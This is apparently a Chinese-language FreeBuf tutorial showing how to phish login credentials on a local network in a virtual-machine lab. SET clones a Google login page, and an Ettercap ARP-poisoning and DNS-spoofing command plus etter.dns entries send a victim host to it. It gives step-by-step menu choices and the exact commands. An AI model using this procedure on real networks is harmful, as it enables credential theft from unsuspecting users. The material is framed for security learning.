技術討論 | 利用SET和Ettercap實現內網釣魚獲取帳號密碼
宣告:文中提及的部分技術可能具有一定攻擊性,僅供安全學習和教學用途,禁止非法使用!本人也是剛剛接觸Web安全,文章如有不當之處,歡迎大家指正,謝謝!
0×00 背景
本文主要是面向剛剛接觸Web安全的新手,通過實驗展示了,如何通過 SET
和 Ettercap
實現內網釣魚竊取帳號密碼。
SET
全稱 Social Engineering Toolkit
。顧名思義,主要用來進行社工攻擊,包括釣魚網站,無線AP攻擊,QRCode攻擊等等。在本次實驗中,SET主要用來搭建釣魚網站,以及監聽HTTP請求中傳送的帳號密碼。
Ettercap
是一個老牌的實施MITM攻擊的軟體。在本次實驗中,Ettercap用於進行DNS欺騙,將使用者訪問的域名解析到攻擊者偽造的釣魚網站的IP地址,從而達成監聽請求的目的。
0×01 實驗環境
本次實驗在虛擬機器環境下進行,攻擊主機和目標主機處於同一區域網網段。
虛擬機器軟體:HyperV (Windows 10 Pro自帶) 攻擊主機:Kali Linux IP: 172.20.86.90 目標主機:Windows 10 IP: 172.20.86.88
0×02 實驗步驟
本次實驗主要包括兩個部分:一個是利用SET快速搭建一個釣魚網站,並監聽訪問網站的請求,二是將域名解析到偽造的釣魚網站的IP地址。
1. SET搭建釣魚網站
由於Kali內建了SET,無需安裝,直接使用命令 setoolkit
啟動SET。
Select from the menu: 1) Social-Engineering Attacks// 選擇1,社會工程學攻擊 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About ...... 99) Exit the Social-Engineer Toolkit
首先,選擇選單中第一個選項,社會工程學攻擊。
1) Spear-Phishing Attack Vectors 2) Website Attack Vectors// 選擇2,網站攻擊 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) SMS Spoofing Attack Vector 11) Third Party Modules
然後,選擇選單中第二個選項,網站攻擊。
1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method// 選擇3,竊取憑證 4) Tabnabbing Attack Method 5) Web Jacking Attack Method 6) Multi-Attack Web Method 7) Full Screen Attack Method 8) HTA Attack Method
選擇第三個選項,竊取憑證。
1) Web Templates// 使用預定義的網站模板 2) Site Cloner// 克隆網頁 3) Custom Import// 從指定目錄匯入網站
在此,為了方便,我們直接選擇1,使用SET中內建的網站模板來進行實驗。
set:webattack> IP address for the POST back in Harvester/Tabnabbing [172.20.86.90]:
直接回車,使用預設IP,即Kali的區域網IP。
1. Java Required 2. Google 3. Twitter
選擇2,使用Google登入頁面作為釣魚網站。
[*] The Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below:
此時,SET打印出提示,釣魚網站已經搭建完畢,訪問埠為 80
。如果有網頁訪問資訊,那麼控制檯會將其打印出來。
開啟目標主機Win10的瀏覽器,位址列輸入 172.20.86.90
,即可訪問剛才搭建成功的釣魚網站,Google的登入頁面。
同時,SET的控制檯打印出來一條訪問請求記錄。
2. Ettercap DNS欺騙
Kali預設也安裝了Ettercap。Ettercap有命令列和圖形介面兩種模式可以使用,在此直接選擇使用命令列模式。
首先,輸入 vim /etc/ettercap/etter.dns
配置DNS轉發。新增如下內容,將對於 google.com
域名的訪問轉發到 172.20.86.90
(Kali攻擊主機IP)。
// etter.dns google.comA172.20.86.90 *.google.comA172.20.86.90 www.google.comPTR172.20.86.90
配置完成後,使用如下命令啟動Ettercap。
ettercap -i eth0 -T -P dns_spoof -M arp /172.20.86.88///
簡單解釋一下這幾個引數的含義。更詳細的文件,請使用 man ettercap
檢視
-i 指定網絡卡 eth0 -T 使用文字模式 -P 指定Plugin dns_spoof -M 開啟MITM arp
可以看到,成功啟動Ettercap後,已對目標主機(172.20.86.88)實施DNS欺騙。
0×03 場景模擬
使用者在Win10下,開啟Edge瀏覽器,在位址列輸入google.com。這是Google登入頁面彈出。
使用者輸入帳號 [email protected]
,密碼 p@ssw0rd
,回車進行登入。
開啟SET控制檯,即可發現捕捉到了這次登入的請求,成功竊取帳號密碼。
0×04 總結
本次實驗,主要是通過DNS欺騙轉發使用者請求到釣魚網站,從而實現竊取使用者的登入資訊。但是存在以下不足:
1.未考慮HTTPS的情況,HTTPS的訪問不會轉發到目標IP。
2.釣魚網頁的點選登入後,應該跳轉到正常的網站首頁,而不是仍停留在登入頁面。
*本文原創作者:kenmick,本文屬FreeBuf原創獎勵計劃,未經許可禁止轉載